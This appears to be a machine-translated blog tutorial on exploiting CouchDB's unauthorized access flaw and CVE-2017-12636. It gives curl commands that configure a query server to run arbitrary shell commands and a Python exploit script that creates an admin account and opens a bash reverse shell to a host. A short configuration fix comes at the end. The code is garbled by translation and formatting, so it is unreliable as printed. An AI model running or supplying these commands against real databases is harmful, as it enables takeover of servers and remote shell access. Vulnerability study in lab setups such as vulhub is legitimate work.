CouchDB Unauthorized Access Vulnerability

0x00 COUCHDB Installation

COUCHDB Official website: http://couchdb.apache.org/

Next until the installation is complete, open the browser and visit the following link: http://127.0.0.1:5984/

You can use the following URLs to interact with the COUCHDB Web interface: http://127.0.0.1:5984/_utils

0x01 Exploit Exploits

1, add Query_server configuration, write the command to execute; curl-x PUT ' Http://username:[email protected]:5984/_config/query_servers/cmd '-d ' "id >/tmp/success "' 2, create a new temporary library and temporary table, insert a record; Curl-x put ' http://username:[email protected]:5984/vultest ' curl-x put ' http ://username:[email Protected]:5984/vultest/vul '-d ' {"_id": "770895a97726d5ca6d70a22173005c7b"} ' 3, calling Query_ The server processes data curl-x POST ' Http://username:[email protected]:5984/vultest/_temp_view?limit=10 '-d ' {"Language": "cmd", " Map ":"} '-H ' content-type:application/json '

After execution, you can see that the specified command has been executed successfully:

0x02 python using scripts

Modify the target and command for your test machine, and then modify version for the corresponding COUCHDB release, successfully bouncing the shell.

Reference from: https://github.com/vulhub/vulhub/blob/master/couchdb/CVE-2017-12636/exp.py

#!/usr/bin/ENV Python3import Requests fromRequests.auth Import Httpbasicauthtarget='http://192.168.8.148:5984'Command='"Bash-i >&/dev/tcp/192.168.8.148/4444 0>&1"'version=2Session=requests.session () session.headers= {    'Content-type':'Application/json'}# session.proxies= {#     'http':'http://127.0.0.1:8085'#}session.put (Target+'/_users/org.couchdb.user:wooyun', Data=" "{  "type":"User",  "name":"Wooyun",  "Roles": ["_admin"],  "Roles": [],  "Password":"Wooyun"}" ")Session.auth= Httpbasicauth ('Wooyun','Wooyun')ifVersion = =1: Session.put (Target+ ('/_config/query_servers/cmd'), Data=command)Else: Host= Session.Get(Target +'/_membership'). JSON () ['All_nodes'][0] Session.put (target+'/_node/{}/_config/query_servers/cmd'. Format (host), Data=command) session.put (target+'/wooyun') session.put (target+'/wooyun/test', Data='{"_id": "Wooyuntest"}')ifVersion = =1: Session.post (Target+'/wooyun/_temp_view?limit=10', Data='{"Language": "cmd", "Map": ""}')Else: Session.put (Target+'/wooyun/_design/test', Data='{"_id": "_design/test", "views": {"Wooyun": {"map": "}}," Language ":" CMD "}')

0X04 Solutions

In the Couchdb\etc\couchdb\default.ini

Port =5984couchdb Port number bind_address=0.0.0.0The IP address of the COUCHDB, if set to 127 here.0.0.1, then the extranet cannot be accessed. Max_connections=2048couchdb Maximum number of connections Database_dir= .. /var/lib/couchdb Data file directory View_index_dir= .. /var/lib/couchdb Index file directory util_driver_dir= .. /lib/couch-1.0.1/priv/lib driver files directory file= .. /var/log/couchdb/couch.log log file level= info Log Level

Reference Links:

COUCHDB installation Configuration

Http://www.yiibai.com/couchdb/installation.html

Couchdb arbitrary command Execution Vulnerability (cve-2017-12636)

https://vulhub.org/#/environments/couchdb/CVE-2017-12636/

CouchDB Unauthorized Access Vulnerability